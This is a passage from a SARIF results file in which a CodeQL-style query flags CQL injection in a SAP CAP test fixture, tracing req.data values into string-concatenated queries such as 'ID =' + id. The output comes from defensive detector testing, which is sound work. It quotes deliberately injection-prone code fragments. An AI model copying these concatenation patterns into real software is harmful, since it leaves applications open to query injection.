value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":7,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"29bf643a411d8976:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":33,"endColumn":44}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":37,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":38,"startColumn":33,"endColumn":44}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":7,"endColumn":45}}}],"partialFingerprints":{"primaryLocationLineHash":"ef21b26f64e7e417:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":42,"endColumn":44}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":33,"endColumn":44}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":42,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":43,"startColumn":33,"endColumn":44}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":7,"endColumn":44}}}],"partialFingerprints":{"primaryLocationLineHash":"9d03b555ff929ea0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":39,"endColumn":41}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":33,"endColumn":43}},"message":{"text":"`ID=${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":47,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":48,"startColumn":33,"endColumn":43}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"b7f3fae4cc5d3224:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":75,"endColumn":77}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":63,"endColumn":77}},"message":{"text":"\"col1 = \" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":72,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":73,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"6a3ab8595760f6c0:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":75,"endColumn":77}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":63,"endColumn":77}},"message":{"text":"`col1 = ` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":77,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":78,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1).\nThis CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":7,"endColumn":78}}}],"partialFingerprints":{"primaryLocationLineHash":"342691d0eacbdb40:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]},{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":73,"endColumn":75}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":63,"endColumn":77}},"message":{"text":"`col1 = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":82,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":33,"endColumn":55}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":83,"startColumn":63,"endColumn":77}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":7,"endColumn":76}}}],"partialFingerprints":{"primaryLocationLineHash":"e84c1b8cf5608a54:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":13,"endColumn":27}},"message":{"text":"{ id, amount }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":19,"endColumn":25}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":49,"endColumn":55}},"message":{"text":"amount"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":33,"endColumn":55}},"message":{"text":"\"col1 = ...  amount"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":87,"startColumn":30,"endColumn":38}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":88,"startColumn":33,"endColumn":55}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"c8e83fb2aff22206:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":44,"endColumn":46}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":35,"endColumn":46}},"message":{"text":"\"ID =\" + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":122,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":123,"startColumn":35,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":7,"endColumn":47}}}],"partialFingerprints":{"primaryLocationLineHash":"980ed798eb9fd08f:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":44,"endColumn":46}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":35,"endColumn":46}},"message":{"text":"`ID =` + id"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":127,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":128,"startColumn":35,"endColumn":46}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided value](1)."},"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":7,"endColumn":48}}}],"partialFingerprints":{"primaryLocationLineHash":"580b744db9ff8fbe:1","primaryLocationStartColumnFingerprint":"0"},"codeFlows":[{"threadFlows":[{"locations":[{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}},"message":{"text":"req.data"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":13,"endColumn":19}},"message":{"text":"{ id }"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":15,"endColumn":17}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":43,"endColumn":45}},"message":{"text":"id"}}},{"location":{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":35,"endColumn":47}},"message":{"text":"`ID = ${id}`"}}}]}]}],"relatedLocations":[{"id":1,"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}},"message":{"text":"user-provided value"}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":132,"startColumn":22,"endColumn":30}}},{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.js","uriBaseId":"%SRCROOT%","index":0},"region":{"startLine":133,"startColumn":35,"endColumn":47}}}]},{"ruleId":"js/cap-sql-injection","rule":{"id":"js/cap-sql-injection","index":1,"toolComponent":{"index":8}},"message":{"text":"This CQL query contains a string concatenation with a [user-provided 